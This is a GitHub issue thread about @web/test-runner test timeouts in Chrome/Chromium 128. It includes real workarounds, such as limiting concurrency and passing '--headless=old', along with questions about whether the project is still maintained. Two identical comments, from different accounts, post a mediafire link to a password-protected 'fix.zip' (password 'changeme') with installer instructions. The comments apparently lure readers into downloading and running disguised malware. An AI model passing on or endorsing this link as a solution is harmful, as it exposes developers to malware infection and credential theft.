### ISSUE TITLE
@open-wc/testing: timeout failures in tests after upgrading to Chrome/Chromium v128

### ISSUE THREAD

**Issue by tirithen** [open-wc/open-wc#2813]
## Expected behavior

I expect tests that passes on Chrome and Chromium version 127 to also work with Chrome and Chromium 128.

## Actual Behavior

Running the same tests after upgrading Chrome version 127 on Windows and Chromium version 127 on Arch Linux to version 128 many of the tests now timeout with output like:

```javascript
src/utils/myFunction.test.js:

 ❌ Error: Timeout of 10000ms exceeded. For async tests and hooks, ensure "done()" is called; if returning a Promise, ensure it resolves.
      at createTimeoutError (node_modules/@web/test-runner-mocha/dist/autorun.js:1:243195)
      at Gg._timeoutError (node_modules/@web/test-runner-mocha/dist/autorun.js:1:259145)
      at node_modules/@web/test-runner-mocha/dist/autorun.js:1:257217
```

Downgrading Chromuim to version to the pacman version chromium-127.0.6533.99-1 on the Arch Linux machine makes the tests run perfectly fine again.

Maybe the API/protocol in Chromium has been changed in version 128?

## Additional context

Created the project ~3 years ago with `$ npm init @open-wc`, and using the following `web-test-runner.config.mjs` config:

```javascript
const filteredLogs = ['Running in dev mode', 'lit-html is in dev mode', '\'lit-element\' module entrypoint is deprecated'];

export default /** @type {import("@web/test-runner").TestRunnerConfig} */ ({
  files: ['test/**/*.test.js', 'src/**/*.test.js'],
  nodeResolve: true,
  coverageConfig: {
    include: ['src/**/*.js'],
    reporters: ['lcov', 'cobertura']
  },

  testFramework: {
    config: {
      timeout: 10000,
    },
  },

  /** Filter out lit dev mode logs */
  filterBrowserLogs(log) {
    for (const arg of log.args) {
      if (typeof arg === 'string' && filteredLogs.some(l => arg.includes(l))) {
        return false;
      }
    }
    return true;
  },

  testRunnerHtml: testFramework =>`
    <!DOCTYPE html>
    <html>
      <head>
      </head>
      <body>
        <script type="module" src="${testFramework}"></script>
      </body>
    </html>
  `.trim(),

  /** Compile JS for older browsers. Requires @web/dev-server-esbuild plugin */
  // esbuildTarget: 'auto',

  /** Confgure bare import resolve plugin */
  // nodeResolve: {
  //   exportConditions: ['browser', 'development']
  // },

  /** Amount of browsers to run concurrently */
  // concurrentBrowsers: 2,

  /** Amount of test files per browser to test concurrently */
  // concurrency: 1,

  /** Browsers to run tests on */
  // browsers: [
  //   playwrightLauncher({ product: 'chromium' }),
  //   playwrightLauncher({ product: 'firefox' }),
  //   playwrightLauncher({ product: 'webkit' }),
  // ],

  // See documentation for all available options
  // https://modern-web.dev/docs/test-runner/cli-and-configuration/
});
```

**Comment by thepassle** [comment]
We've had another report that there's a change in timings in Chrome 128, which is something that's outside of the control of this library unfortunately. Have you tried increasing the timeout setting of Mocha?

**Comment by tirithen** [comment]
Thank you for the fast response! As I understand from https://modern-web.dev/docs/test-runner/test-frameworks/mocha/#configuring-mocha-options my mocha timeout is already set to 10 000 ms:

```javascript
  testFramework: {
    config: {
      timeout: 10000,
    },
  },
  ```

That seem like quite a lot as each successful test rarely takes more than 100 ms, at least with older Chromium versions.  I changed the timeout to 30000 just in case, but I still get errors (`Error: Timeout of 30000ms exceeded. For async tests and hooks, ensure "done()" ...`).

It seems like something else is needed to fix the issue. In case you have hints on which dependency that talks with Chromuim, then I could maybe follow up with an issue on that project instead.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SimonAlling** [comment]
## Solution/workaround

In `web-test-runner.config.mjs`:

```javascript
import { chromeLauncher } from "@web/test-runner-chrome";

export default {
  // …
  browsers: [
    chromeLauncher({
      concurrency: 1, // Otherwise a lot of tests time out in Chrome 128.
    }),
  ],
};

**Comment by JamesIves** [comment]
We also started seeing this problem with Chromium 128, everything worked as expected with 127. The above workaround doesn't seem to work in my use case as I still get timeout errors, and messaging related to axe when running a11y tests.

```
Error: Axe is already running. Use `await axe.run()` to wait for the previous run to finish before starting a new run.
```

**Comment by Allysony** [comment]
Also running into a lot of timeout issues with Chromium 128.

It looks like in v128, the headless flag default was changed to `--headless=new`
https://chromium.googlesource.com/chromium/src/+/b9b39a430f71c710d16aafcc67278ef77440c18d

Updating  `web-test-runner.config.mjs` with the old headless arg is working for us:
```
import { chromeLauncher } from "@web/test-runner-chrome";

export default {
  // …
  browsers: [
    chromeLauncher({
      // ...
      args: ['--headless=old']
    }),
  ],
};
```

**Comment by tirithen** [comment]
Hi again, I'm wondering if there are plans of keep support for Chromium. I can see that this project has less activity than a few years ago, so probably there are fewer hours to keep these libraries working with newer versions of browser?

It would be good to know if there is an intent to keep this tooling updated or if it is moving towards a deprecation stage. Even if the problem is in a child dependency as I understood might be case on the response from @thepassle , the result is still that the testing tool is currently broken.

I believe that there still are a lot of developers out there finding great use of tooling around standard web components/custom elements, but possibly there is not enough developers available to maintain these tools?

I'm sorry for bringing up problems while not currently being in a position where I can assist in the maintenance. Still it would be wonderful if possible to see this project again becoming more active as the tools provide a lot of value for the users. Any thoughts from current maintainers on this?

**Comment by JamesIves** [comment]
Would like to second this. It doesn't feel like a good long-term fix to require `headless=old` on all tests going forward for some of the patterns that the library provides to work as expected. Feels like something needs to be adjusted to work with the new way Google is handling this. I suspect Google will eventually remove the old headless mode which will cause a lot of headaches downstream.
